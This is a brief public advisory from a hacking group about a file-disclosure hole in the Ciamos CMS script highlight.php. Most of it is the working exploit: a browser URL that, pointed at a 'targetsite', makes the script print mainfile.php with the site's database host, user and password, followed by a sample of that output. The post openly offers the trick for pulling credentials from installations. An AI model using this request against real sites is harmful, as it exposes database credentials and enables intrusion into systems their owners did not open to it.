Ciamos Highlight.php Security Hole(IHS)
********************************************
IHS Iran Hackers Sabotage Public advisory
by : NT NT@xxxxxxxxxxx
********************************************
If You Have CIAMOS Installation Address You Can Use highligh.php Hole
And Get DataBase Configuration(Name,User,Password)
Tested In CIAMOS
-------------------------------------------
Input This Line To Your Browser AddressBar :
http://targetsite/ciamosinstalation/class/debug/highlight.php?
file=ciamosinstallationpath\mainfile.php&line=151#151
Like This :
http://localhost/ciamos/class/debug/highlight.php?
file=c:\phpdev\www\ciamos\mainfile.php&line=151#151
You See This Result :
1 <?php
2 /**
3 * Ciamos: Simple + Flexible + Advanced Content Management
4 * < http://www.ciamos.com >
5 */
6
7 if ( !defined('CIAMOS_MAINFILE_INCLUDED') ) {
8 define('CIAMOS_MAINFILE_INCLUDED', true);
9
10 // Ciamos physical path
11 define('SYS_ROOT_PATH', 'c:/phpdev/www/ciamos');
12
13 // Ciamos URL without trailing slash
14 define('SYS_ROOT_URL', 'http://localhost/ciamos');
15
16 // Folder name for your modules folder
17 define('SYS_MOD_FOLDER', 'modules');
18
19 // Ciamos database layer
20 $sysConfig['database'] = 'mysql';
21
22 // Ciamos table prefix
23 $sysConfig['prefix'] = 'ciamos';
24
25 // Ciamos database host
26 $sysConfig['dbhost'] = 'localhost';
27
28 // Ciamos database user
29 $sysConfig['dbuname'] = 'root';
30
31 // Ciamos database password
32 $sysConfig['dbpass'] = '';
33
34 // Ciamos database name
35 $sysConfig['dbname'] = 'ciamos';
36
37 // Persistent database connection?
38 $sysConfig['db_pconnect'] = 0;
39
40 // Ciamos default language
41 $sysConfig['default_language'] = 'english';
42
43 /**
44 * End edit - do not change anything below this line
45 */
46
47 if ( (SYS_ROOT_PATH == '') && (@file_exists
('_install/index.php')) ) {
48 header('Location: _install/index.php');
49 exit();
50 }
51 include_once(SYS_ROOT_PATH.'/include/common.php');
52 }
?>
------------------------------------------
More Information See:
http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=12
Source Advisory:
http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=15
Found By NT(IHS)
NT@xxxxxxxxxxx
Greet To Lord And C0d3r From IHS.
www.IHSTeam.com
--
www.IHSTEAM.com
www.IHSSECURITY.com